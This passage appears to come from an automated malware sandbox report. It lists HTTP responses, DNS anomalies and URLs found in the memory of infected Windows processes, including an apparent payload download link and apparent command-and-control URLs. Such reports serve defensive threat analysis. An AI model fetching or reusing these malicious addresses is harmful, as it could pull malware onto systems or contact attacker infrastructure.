72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 May 2022 12:26:47 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 281Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 65 74 73 75 7a 61 6d 74 69 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.getsuzamtir.xyz Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 10 May 2022 12:27:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
      Source: ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/
      Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin
      Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bin4
      Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binC:
      Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binf
      Source: ieinstal.exe, 0000001B.00000002.1969164672.0000000003363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.bink
      Source: ieinstal.exe, 0000001B.00000002.1968863137.0000000003338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barsam.com.au/bin_FCWtLoO90.binzs
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
      Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;
      Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
      Source: powershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ce
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
      Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/
      Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
      Source: explorer.exe, 0000001C.00000000.1831225392.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754355480.000000000F61E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243385118.000000000F61E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
      Source: explorer.exe, 0000001C.00000000.2245094496.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1832944454.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1908732750.000000000F74D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1755769020.000000000F74D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://purlorg/dc/elements/1.1/
      Source: explorer.exe, 0000001C.00000000.2218425440.000000000A580000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1715282286.0000000003060000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2218349968.000000000A530000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
      Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
      Source: chkdsk.exe, 00000020.00000002.5743432574.0000000008260000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dujh.xyz/
      Source: chkdsk.exe, 00000020.00000002.5743723179.0000000008280000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5743515367.0000000008264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dujh.xyz/wn19/?AVnXAh=a63aDXt/KdVd8/vhoA3n5O0XH1EsSnoV0YHdqlzRS6BKHLBCb088tgqJ
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/Accident_Lawyers.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/Contact_Lens.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/Designer_Apparel.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJX
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/Healthy_Weight_Loss.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSy
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/Work_from_Home.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/display.cfm
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/find_a_tutor.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/px.js?ch=1
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/px.js?ch=2
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/sk-logabpstatus.php?a=endjMmRmQ2JsNGxkU0gxbkFJUVVyVlRxZ1c3ZnhHTGFGdFNIOFdpSjRR
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/song_lyrics.cfm?fp=pMtm9Aill7qNES4xv4SZ9a1LesnLw1GnvHqwQeAm1ypMqjqXlSyWJXVl4%2
      Source: chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.linqxw.com/wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX
      Source: explorer.exe, 0000001C.00000000.2231797627.000000000D823000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
      Source: explorer.exe, 0000001C.00000000.1796519211.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1726283312.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1874472316.00000000095D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2211492035.00000000095D6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm%
      Source: powershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB2l
      Source: explorer.exe, 0000001C.00000000.2230893917.000000000D686000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
      Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
      Source: explorer.exe, 0000001C.00000000.1715343001.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1861899540.0000000003070000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2198385462.0000000003070000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
      Source: explorer.exe, 0000001C.00000000.2244298074.000000000F6D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1907825476.000000000F6D7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1831648228.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1754749899.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2243796340.000000000F683000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
      Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
      Source: explorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
      Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
      Source: explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
      Source: powershell.exe, 0000000D.00000002.1786134100.00000000051F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000000D.00000002.1798789622.0000000005835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
      Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
      Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
      Source: chkdsk.exe, 00000020.00000003.2181501980.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000020.00000002.5728450040.0000000000A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
      Source: chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0
      Source: powershell.exe, 0000000D.00000002.1803653995.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
